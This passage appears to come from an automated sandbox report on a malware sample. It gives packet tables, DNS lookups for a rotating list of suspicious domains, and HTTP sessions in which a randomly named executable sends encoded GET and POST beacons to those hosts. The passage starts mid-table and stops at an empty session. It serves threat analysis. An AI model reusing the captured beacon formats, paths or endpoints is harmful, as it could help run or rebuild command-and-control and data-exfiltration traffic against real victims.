Nov 12, 2024 15:34:51.562135935 CET	49801	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:52.935527086 CET	49801	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:53.069900990 CET	80	49801	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:53.952929974 CET	49802	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:54.088368893 CET	80	49802	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:54.088669062 CET	49802	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:54.096358061 CET	49802	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:54.230653048 CET	80	49802	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:54.230989933 CET	80	49802	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:54.231250048 CET	49802	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:55.606791973 CET	49802	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:55.741446972 CET	80	49802	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:56.624305010 CET	49803	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:56.769640923 CET	80	49803	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:56.769854069 CET	49803	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:56.777841091 CET	49803	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:56.777877092 CET	49803	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:56.912178040 CET	80	49803	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:56.912271023 CET	80	49803	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:56.912471056 CET	80	49803	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:56.912636995 CET	80	49803	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:56.912652016 CET	80	49803	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:59.311250925 CET	49804	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:59.446716070 CET	80	49804	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:59.446938038 CET	49804	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:59.452414036 CET	49804	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:59.586776972 CET	80	49804	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:59.588041067 CET	80	49804	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:59.588058949 CET	80	49804	13.248.169.48	192.168.11.20
Nov 12, 2024 15:34:59.588413954 CET	49804	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:59.590455055 CET	49804	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:34:59.724714041 CET	80	49804	13.248.169.48	192.168.11.20
Nov 12, 2024 15:35:04.607173920 CET	49805	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:04.741378069 CET	80	49805	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:04.741554976 CET	49805	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:04.749439001 CET	49805	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:04.884165049 CET	80	49805	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:04.884205103 CET	80	49805	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:04.884433031 CET	49805	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:06.260747910 CET	49805	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:07.278178930 CET	49806	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:07.414155960 CET	80	49806	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:07.414331913 CET	49806	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:07.422977924 CET	49806	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:07.558279037 CET	80	49806	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:07.558289051 CET	80	49806	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:07.558451891 CET	49806	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:08.933830976 CET	49806	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:09.949781895 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:10.083897114 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.084074020 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:10.092005014 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:10.092051983 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:10.092098951 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:10.092307091 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:10.226151943 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.226186991 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.226383924 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.226418972 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.226948023 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.226985931 CET	80	49807	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:10.227185965 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:11.603425980 CET	49807	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:12.620784998 CET	49808	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:12.755428076 CET	80	49808	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:12.755633116 CET	49808	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:12.760833979 CET	49808	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:12.896985054 CET	80	49808	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:12.897022963 CET	80	49808	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:12.897242069 CET	49808	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:12.899101019 CET	49808	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:35:13.032769918 CET	80	49808	173.255.194.134	192.168.11.20
Nov 12, 2024 15:35:17.916747093 CET	49809	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:18.037908077 CET	80	49809	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:18.038038969 CET	49809	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:18.046612978 CET	49809	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:18.163783073 CET	80	49809	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:18.182960033 CET	80	49809	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:18.183173895 CET	49809	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:19.554699898 CET	49809	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:19.672676086 CET	80	49809	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:20.572467089 CET	49810	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:20.693284988 CET	80	49810	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:20.693484068 CET	49810	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:20.702032089 CET	49810	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:20.820835114 CET	80	49810	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:20.843422890 CET	80	49810	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:20.843610048 CET	49810	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:22.210326910 CET	49810	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:22.328039885 CET	80	49810	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.228051901 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:23.345619917 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.345885038 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:23.354790926 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:23.354824066 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:23.354899883 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:23.472784042 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.472798109 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.472807884 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.472817898 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.472826958 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.472836971 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.472846985 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.491018057 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:23.491254091 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:24.866017103 CET	49811	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:24.983103991 CET	80	49811	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:25.883443117 CET	49812	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:26.019419909 CET	80	49812	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:26.019581079 CET	49812	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:26.025338888 CET	49812	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:26.160465956 CET	80	49812	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:26.164432049 CET	80	49812	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:26.164526939 CET	80	49812	3.33.130.190	192.168.11.20
Nov 12, 2024 15:35:26.164832115 CET	49812	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:26.168703079 CET	49812	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:35:26.303931952 CET	80	49812	3.33.130.190	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 15:29:48.965755939 CET	51626	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:29:49.156141996 CET	53	51626	1.1.1.1	192.168.11.20
Nov 12, 2024 15:30:04.829036951 CET	59070	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:30:05.842056990 CET	59070	53	192.168.11.20	9.9.9.9
Nov 12, 2024 15:30:05.843352079 CET	53	59070	1.1.1.1	192.168.11.20
Nov 12, 2024 15:30:07.367141008 CET	53	59070	9.9.9.9	192.168.11.20
Nov 12, 2024 15:30:20.106770992 CET	52947	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:30:20.827536106 CET	53	52947	1.1.1.1	192.168.11.20
Nov 12, 2024 15:30:35.056752920 CET	65193	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:30:35.229789019 CET	53	65193	1.1.1.1	192.168.11.20
Nov 12, 2024 15:30:49.069698095 CET	63685	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:30:49.243469954 CET	53	63685	1.1.1.1	192.168.11.20
Nov 12, 2024 15:31:04.003473997 CET	57025	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:31:04.166251898 CET	53	57025	1.1.1.1	192.168.11.20
Nov 12, 2024 15:31:17.703567028 CET	55193	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:31:17.869975090 CET	53	55193	1.1.1.1	192.168.11.20
Nov 12, 2024 15:31:31.185004950 CET	63529	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:31:31.379456997 CET	53	63529	1.1.1.1	192.168.11.20
Nov 12, 2024 15:31:44.666758060 CET	53280	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:31:44.848546982 CET	53	53280	1.1.1.1	192.168.11.20
Nov 12, 2024 15:31:58.101063013 CET	61569	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:31:58.304486990 CET	53	61569	1.1.1.1	192.168.11.20
Nov 12, 2024 15:32:12.113635063 CET	57210	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:32:12.272831917 CET	53	57210	1.1.1.1	192.168.11.20
Nov 12, 2024 15:32:25.503344059 CET	58437	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:32:25.695216894 CET	53	58437	1.1.1.1	192.168.11.20
Nov 12, 2024 15:32:38.982966900 CET	59808	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:32:39.214004993 CET	53	59808	1.1.1.1	192.168.11.20
Nov 12, 2024 15:32:52.510981083 CET	59946	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:32:52.706249952 CET	53	59946	1.1.1.1	192.168.11.20
Nov 12, 2024 15:33:06.008047104 CET	62423	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:33:06.283941031 CET	53	62423	1.1.1.1	192.168.11.20
Nov 12, 2024 15:33:19.567660093 CET	51126	53	192.168.11.20	1.1.1.1
Nov 12, 2024 15:33:19.816052914 CET	53	51126	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 15:29:48.965755939 CET	192.168.11.20	1.1.1.1	0xbb58	Standard query (0)	www.zz83x.top	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:04.829036951 CET	192.168.11.20	1.1.1.1	0x8a24	Standard query (0)	www.wukong.college	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:05.842056990 CET	192.168.11.20	9.9.9.9	0x8a24	Standard query (0)	www.wukong.college	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:20.106770992 CET	192.168.11.20	1.1.1.1	0xe89b	Standard query (0)	www.qiusuo.vip	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:35.056752920 CET	192.168.11.20	1.1.1.1	0xe0a6	Standard query (0)	www.pg874.shop	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:49.069698095 CET	192.168.11.20	1.1.1.1	0x216	Standard query (0)	www.rimberiokitchen.online	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:04.003473997 CET	192.168.11.20	1.1.1.1	0x1cff	Standard query (0)	www.futurevision.life	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:17.703567028 CET	192.168.11.20	1.1.1.1	0x712e	Standard query (0)	www.dreampay.shop	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.185004950 CET	192.168.11.20	1.1.1.1	0xdc55	Standard query (0)	www.jigg.space	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:44.666758060 CET	192.168.11.20	1.1.1.1	0x152a	Standard query (0)	www.econsultoria.online	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:58.101063013 CET	192.168.11.20	1.1.1.1	0x4c05	Standard query (0)	www.webworld.digital	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:12.113635063 CET	192.168.11.20	1.1.1.1	0xcd97	Standard query (0)	www.smartbuyoffer.online	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:25.503344059 CET	192.168.11.20	1.1.1.1	0xc418	Standard query (0)	www.makerpay.xyz	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:38.982966900 CET	192.168.11.20	1.1.1.1	0x8a32	Standard query (0)	www.jiujiuxi.love	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:52.510981083 CET	192.168.11.20	1.1.1.1	0xdd4c	Standard query (0)	www.moneys.fit	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:33:06.008047104 CET	192.168.11.20	1.1.1.1	0x3236	Standard query (0)	www.vnxoso88.art	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:33:19.567660093 CET	192.168.11.20	1.1.1.1	0x9314	Standard query (0)	www.ebook.farm	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 15:29:49.156141996 CET	1.1.1.1	192.168.11.20	0xbb58	No error (0)	www.zz83x.top	zz83x.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:29:49.156141996 CET	1.1.1.1	192.168.11.20	0xbb58	No error (0)	zz83x.top		206.119.81.121	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:05.843352079 CET	1.1.1.1	192.168.11.20	0x8a24	No error (0)	www.wukong.college		47.52.221.8	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:07.367141008 CET	9.9.9.9	192.168.11.20	0x8a24	No error (0)	www.wukong.college		47.52.221.8	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:20.827536106 CET	1.1.1.1	192.168.11.20	0xe89b	No error (0)	www.qiusuo.vip		154.38.64.6	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:35.229789019 CET	1.1.1.1	192.168.11.20	0xe0a6	No error (0)	www.pg874.shop	pg874.shop		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:30:35.229789019 CET	1.1.1.1	192.168.11.20	0xe0a6	No error (0)	pg874.shop		84.32.84.32	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:30:49.243469954 CET	1.1.1.1	192.168.11.20	0x216	No error (0)	www.rimberiokitchen.online		208.91.197.27	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:04.166251898 CET	1.1.1.1	192.168.11.20	0x1cff	No error (0)	www.futurevision.life		203.161.49.193	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:17.869975090 CET	1.1.1.1	192.168.11.20	0x712e	No error (0)	www.dreampay.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:17.869975090 CET	1.1.1.1	192.168.11.20	0x712e	No error (0)	www.dreampay.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		173.255.194.134	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.33.20.235	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.33.23.183	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		198.58.118.167	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.79.19.196	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		96.126.123.244	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		72.14.178.174	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.33.18.44	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.33.2.79	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.56.79.23	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		45.33.30.197	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:31.379456997 CET	1.1.1.1	192.168.11.20	0xdc55	No error (0)	www.jigg.space		72.14.185.43	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:44.848546982 CET	1.1.1.1	192.168.11.20	0x152a	No error (0)	www.econsultoria.online	econsultoria.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:31:44.848546982 CET	1.1.1.1	192.168.11.20	0x152a	No error (0)	econsultoria.online		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:44.848546982 CET	1.1.1.1	192.168.11.20	0x152a	No error (0)	econsultoria.online		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:31:58.304486990 CET	1.1.1.1	192.168.11.20	0x4c05	No error (0)	www.webworld.digital	webworld.digital		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:31:58.304486990 CET	1.1.1.1	192.168.11.20	0x4c05	No error (0)	webworld.digital		84.32.84.32	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:12.272831917 CET	1.1.1.1	192.168.11.20	0xcd97	No error (0)	www.smartbuyoffer.online	smartbuyoffer.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:32:12.272831917 CET	1.1.1.1	192.168.11.20	0xcd97	No error (0)	smartbuyoffer.online		108.179.252.152	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:25.695216894 CET	1.1.1.1	192.168.11.20	0xc418	No error (0)	www.makerpay.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:25.695216894 CET	1.1.1.1	192.168.11.20	0xc418	No error (0)	www.makerpay.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:39.214004993 CET	1.1.1.1	192.168.11.20	0x8a32	No error (0)	www.jiujiuxi.love		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:52.706249952 CET	1.1.1.1	192.168.11.20	0xdd4c	No error (0)	www.moneys.fit	moneys.fit		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:32:52.706249952 CET	1.1.1.1	192.168.11.20	0xdd4c	No error (0)	moneys.fit		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:32:52.706249952 CET	1.1.1.1	192.168.11.20	0xdd4c	No error (0)	moneys.fit		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:33:06.283941031 CET	1.1.1.1	192.168.11.20	0x3236	No error (0)	www.vnxoso88.art	77980.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 15:33:06.283941031 CET	1.1.1.1	192.168.11.20	0x3236	No error (0)	77980.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:33:19.816052914 CET	1.1.1.1	192.168.11.20	0x9314	No error (0)	www.ebook.farm		199.59.243.227	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.zz83x.top

www.wukong.college

www.qiusuo.vip

www.pg874.shop

www.rimberiokitchen.online

www.futurevision.life

www.dreampay.shop

www.jigg.space

www.econsultoria.online

www.webworld.digital

www.smartbuyoffer.online

www.makerpay.xyz

www.jiujiuxi.love

www.moneys.fit

www.vnxoso88.art

www.ebook.farm

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49719	206.119.81.121	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:29:49.480458975 CET	472	OUT	GET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1 Host: www.zz83x.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:29:49.793483973 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 14:29:49 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66f0ea70-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49720	47.52.221.8	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:06.171499014 CET	753	OUT	POST /4wc1/ HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.wukong.college Referer: http://www.wukong.college/4wc1/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 42 62 68 4e 4d 50 31 41 4a 70 38 37 4c 76 77 48 35 55 39 4c 36 38 62 41 75 79 47 62 6a 78 4f 4e 4b 70 55 6b 73 75 75 59 43 37 58 49 6c 55 4c 48 35 64 50 39 75 4f 69 4c 47 2f 77 61 63 78 71 66 6f 36 74 47 54 50 77 4a 58 6a 4b 74 39 4d 46 51 4e 47 39 41 57 47 79 62 69 42 5a 44 44 48 6d 51 62 70 52 63 70 73 49 69 30 52 7a 4e 37 6b 5a 72 59 59 49 6e 37 37 36 51 34 2b 36 6c 41 6d 6b 4d 38 4f 74 62 4a 42 51 52 36 68 54 37 55 6c 4d 50 38 68 4c 34 70 58 67 6b 6a 2b 7a 68 78 6d 77 72 38 70 45 73 61 47 73 2b 73 76 45 41 4f 43 36 69 77 74 79 44 4c 77 3d 3d Data Ascii: mRu=7qP3g7pHYt35BbhNMP1AJp87LvwH5U9L68bAuyGbjxONKpUksuuYC7XIlULH5dP9uOiLG/wacxqfo6tGTPwJXjKt9MFQNG9AWGybiBZDDHmQbpRcpsIi0RzN7kZrYYIn776Q4+6lAmkM8OtbJBQR6hT7UlMP8hL4pXgkj+zhxmwr8pEsaGs+svEAOC6iwtyDLw==
Nov 12, 2024 15:30:06.488620996 CET	389	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:30:06 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 178 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49721	47.52.221.8	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
